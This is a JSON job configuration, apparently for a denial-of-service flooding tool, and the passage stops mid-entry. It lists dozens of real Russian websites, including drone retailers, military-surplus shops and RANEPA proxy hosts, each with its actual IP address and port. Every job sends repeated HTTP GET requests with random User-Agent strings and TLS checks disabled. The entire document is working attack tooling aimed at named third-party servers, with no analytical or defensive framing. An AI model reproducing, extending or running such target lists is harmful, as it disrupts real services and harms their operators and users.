{
  "jobs": [
    {
      "type": "packetgen",
      "name": "phoenix-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.114.136.60:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://phoenix-dnr.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "phoenix-dnr.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.114.136.60:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://phoenix-dnr.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "ranepa-proxy-01.ranepa.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "83.143.65.195:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://ranepa-proxy-01.ranepa.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "lk-webproxy-01.ranepa.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "83.143.65.191:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://lk-webproxy-01.ranepa.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "lk-webproxy-02.ranepa.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "83.143.65.192:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://lk-webproxy-02.ranepa.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "ranepa-proxy-02.ranepa.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "83.143.65.196:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://ranepa-proxy-02.ranepa.ru",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "dronecentre.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "92.53.96.119:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://dronecentre.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "rocket-market.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "62.109.22.132:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://rocket-market.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "brlab.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "92.53.96.4:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://brlab.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "terradrones.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.170.244.102:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://terradrones.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "artdrone.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "90.156.201.39:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://artdrone.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "artdrone.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "90.156.201.52:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://artdrone.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "artdrone.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "90.156.201.105:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://artdrone.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "artdrone.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "90.156.201.108:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://artdrone.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "quadrocopter.su",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.84.110.84:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://quadrocopter.su/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "quadrocopter.su",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.84.110.85:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://quadrocopter.su/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "eco-motion.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.87.196.51:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://eco-motion.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "skymec.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://skymec.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "skymec.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://skymec.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "djimsk.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://djimsk.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "djimsk.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://djimsk.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "digbox.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://digbox.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "digbox.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "51.250.52.12:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://digbox.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "turbopult.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "62.182.157.232:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://turbopult.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "esegway.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.198.215:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://esegway.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "xn--c1adyelhlm.xn--p1ai",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.114.245.193:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://xn--c1adyelhlm.xn--p1ai/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.nwht.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "92.63.111.127:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.nwht.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "ant-shop.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "92.53.96.148:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://ant-shop.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "4drone.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "87.236.16.235:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://4drone.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "fixfly.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "81.200.118.152:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://fixfly.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "uav-siberia.com",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.196.23:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://uav-siberia.com/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.case-store.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.218.221.253:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.case-store.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "sozvezdie.su",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "95.167.120.115:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://sozvezdie.su",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.oaovoentorg.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.203.65:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.oaovoentorg.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "armchi.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.196.220:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://armchi.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "kapterka.com",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "195.208.0.143:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://kapterka.com/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voen36.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "82.146.33.226:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voen36.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.voentorga.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "89.108.103.182:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.voentorga.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.ak47-shop.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "5.23.50.61:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.ak47-shop.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "ataman-23.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "81.177.6.232:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://ataman-23.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "ataman-23.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "81.177.6.232:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://ataman-23.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voentorg-dmitrov.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.32.58.197:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voentorg-dmitrov.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voentorg-dmitrov.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.32.58.197:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://voentorg-dmitrov.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.voentorg5.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.198.179:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.voentorg5.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voentorg-sklad.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "178.170.244.247:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voentorg-sklad.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.placetorg.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "188.225.40.162:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.placetorg.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.placetorg.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "188.225.40.162:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.placetorg.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.militarist.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.198.181:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.militarist.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.grenada-tc.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.198.211:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.grenada-tc.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.diversantkenig.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "78.37.84.51:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.diversantkenig.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.diversantkenig.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "78.37.84.51:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.diversantkenig.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voentorg.fo.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "91.227.52.108:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voentorg.fo.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.kapterka.com",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "195.208.0.143:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.kapterka.com/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "kamuflage.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "95.213.187.66:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://kamuflage.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "kamuflage.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "95.213.187.66:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://kamuflage.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "voenka24.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "37.140.192.175:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://voenka24.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "xn--80aaebntaodyajhmq7r7a.xn--p1ai",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.196.234:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://xn--80aaebntaodyajhmq7r7a.xn--p1ai/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.blok-post.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "188.120.239.21:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.blok-post.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.blok-post.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "188.120.239.21:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://www.blok-post.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.garnizon40.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "5.23.50.132:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.garnizon40.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "www.garsing.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.196.218:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://www.garsing.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "barrakuda.biz",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "45.130.41.30:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://barrakuda.biz/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "fdtactical.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "188.225.34.156:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://fdtactical.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "skhron.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "31.31.196.155:80"
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "http://skhron.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "armrus.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "185.253.34.99:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://armrus.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "mundirmvd.ru",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "92.53.123.166:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://mundirmvd.ru/",
              "headers": {
                "User-Agent": "{{ random_user_agent }}"
              }
            }
          }
        }
      },
      "count": 9
    },
    {
      "type": "packetgen",
      "name": "profarmy.store",
      "args": {
        "dynamic": false,
        "connection": {
          "type": "net",
          "args": {
            "protocol": "tcp",
            "address": "95.163.119.212:443",
            "tls_config": {
              "insecure_skip_verify": true
            }
          }
        },
        "packet": {
          "payload": {
            "type": "http",
            "data": {
              "method": "GET",
              "path": "https://profarmy.store/",
